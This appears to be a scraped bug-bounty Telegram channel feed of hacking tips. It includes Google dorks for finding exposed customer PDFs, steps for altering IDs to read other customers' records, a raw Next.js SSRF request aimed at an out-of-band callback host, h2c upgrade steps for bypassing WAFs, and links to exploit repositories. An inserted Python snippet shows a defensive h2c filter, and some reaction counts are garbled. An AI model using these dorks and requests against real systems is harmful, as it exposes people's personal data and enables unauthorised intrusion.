Brut Security
✅ Queries: @wtf_brut
🛃 WhatsApp: wa.link/brutsecurity
🈴 Training: brutsec.com
📨 E-mail: [email protected]
Hey Hunters,
DarkShadow here, back again, just dropping an awesome dork that makes pure bounty!

Unauthenticated Access to Sensitive Customer Data via Google Dorking

✅ Steps to reproduce:

- dork:
  site:*.target.com* "date of birth" ext:pdf
- Check if the PDF file is exposing customer data.
- Notice the ID in the URL.
- If, by changing the ID, you are able to access other data.

Result: IDOR+Sensitive info leak (such as customer data)



Now guys, let me know: do you want to know all the dorks that make pure bounty?

If you guys want, then show your love; I'll probably make a tool for automation or post the method.

Follow for More x.com/darkshadow2bd

#bugbountytips #dork #idor
CVE-2025-8085: SSRF in Ditty WordPress plugin, 8.6 rating ❗️

The vulnerability allows attackers without authentication to make requests to arbitrary URLs.

Search at Netlas.io:
👉 Link: https://nt.ls/HthP0
👉 Dork: http.body:"plugins/ditty-news-ticker"

Read more: https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/
Hey Hunters,
DarkShadow here, back again, dropping a critical SSRF 💥

Next.js SSRF in Middleware header!
✅ POC:

GET / HTTP/1.1
Host: target. com
Location: https://oast. me
X-Middleware-Rewrite: https://oast. me


If you guys really enjoyed reading, then show your love and follow me: x.com/darkshadow2bd

#ssrf #bugbountytips
Bug Bounty Checklist.pdf
149.5 KB
Hey Hunters,
DarkShadow here, back again!

Check your Burp: isn't this feature enabled?

Most hackers miss this thing. So, this is a great opportunity to make bounty using this Burp feature.

#bugbountytips #burp
1❀8πŸ‘7πŸ‘4πŸ”₯2
🪲 Bug Bounty Pro Tip: #H2C Upgrade Bypass

Target: Applications using HTTP/2 Cleartext (h2c) upgrades.

The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.

How to Test:

1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).

2. Send an initial HTTP/1.1 request with the upgrade header:

GET / HTTP/1.1
Host: example.com
Upgrade: h2c
Connection: Upgrade

3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2.

4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls.

Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection.

#BugBounty #Hacking #WebSecurity #WAFBypass #HTTP2
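Defender's view of the h2c tip above, as an added example that is not part of the original post: an edge proxy or WAF can refuse to pass the h2c upgrade offer to the backend, so the connection is never switched to HTTP/2 behind the inspection layer. The function name `strip_h2c` is hypothetical and the sample requests are constructed.

```python
# Added example: an edge filter that removes h2c upgrade offers before forwarding.

def _tokens(value):
    """Split a comma-separated header value into trimmed, non-empty tokens."""
    return [t.strip() for t in value.split(",") if t.strip()]

def strip_h2c(raw: bytes):
    """Return (flagged, request); the returned request never offers h2c."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = [tuple(p.strip() for p in l.split(":", 1)) for l in lines[1:] if ":" in l]
    offered = [t for n, v in headers if n.lower() == "upgrade" for t in _tokens(v)]
    if not any(t.lower() == "h2c" for t in offered):
        return False, raw                      # no h2c offer, forward unchanged
    # Keep other upgrade protocols (e.g. websocket) so they still work.
    other_upgrades = [t for t in offered if t.lower() != "h2c"]
    drop_conn = {"http2-settings"} | (set() if other_upgrades else {"upgrade"})
    out, upgrade_written = [lines[0]], False
    for name, value in headers:
        lname = name.lower()
        if lname == "http2-settings":
            continue                           # only meaningful for h2c
        if lname == "upgrade":
            if other_upgrades and not upgrade_written:
                out.append(f"{name}: {', '.join(other_upgrades)}")
                upgrade_written = True
            continue
        if lname == "connection":
            kept = [t for t in _tokens(value) if t.lower() not in drop_conn]
            if not kept:
                continue
            value = ", ".join(kept)
        out.append(f"{name}: {value}")
    return True, "\r\n".join(out).encode("iso-8859-1") + sep + body

# Constructed sample requests (not captured traffic).
H2C_REQ = (b"GET / HTTP/1.1\r\nHost: example.com\r\nUpgrade: h2c\r\n"
           b"HTTP2-Settings: AAMAAABkAAQAAP__\r\nConnection: Upgrade, HTTP2-Settings\r\n\r\n")
WS_REQ = (b"GET /chat HTTP/1.1\r\nHost: example.com\r\nUpgrade: websocket\r\n"
          b"Connection: Upgrade\r\n\r\n")

if __name__ == "__main__":
    for req in (H2C_REQ, WS_REQ):
        flagged, cleaned = strip_h2c(req)
        print("h2c offer seen:", flagged, "| forwarded:", cleaned)
```

The `flagged` result is also worth logging at the edge, since a client offering h2c to a public front end is unusual.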
dON'T fORGET tO gIVE rEACTIONS
❀26πŸ”₯6😁4πŸ—Ώ1
⚡ Sn1per - Automate your recon like never before!

✅ https://github.com/1N3/Sn1per
⚡ S3Scan - A powerful S3 bucket security scanner designed for penetration testing and bug bounty hunting. This tool automatically detects misconfigurations and security vulnerabilities in AWS S3 buckets.

✅ https://github.com/KingOfBugbounty/s3tk
Mobile Hacking Bug Bounty.pdf
4.4 MB
Mobile Hacking Bug Bounty: The Practical Checklist
⚡ Bug Bounty Reports Extractor - CLI tool that fetches resolved & disclosed HackerOne reports by vulnerability and exports them to CSV.

✅ https://github.com/newstartlikenoneanthor-pixel/report-extractor
❀17πŸ”₯6😱2
😁56πŸ‘5πŸ—Ώ2πŸ‘¨β€πŸ’»1🫑1
⚡️ Recently updated Proof-of-Concepts

✔️ Link to Download - https://github.com/0xMarcio/cve
β˜„οΈFind new associated domains with this simple Google dork:

"Β© <COMPANY>. all rights reserved." -".<COMPANY>.com"
Hey Hunters,
DarkShadow here, back again!

A hidden backdoor was in a PHP version, which allowed remote code execution in the User-Agent header.

Guess, guys, which version is it?

#backdoor
❀19😁2πŸ‘¨β€πŸ’»1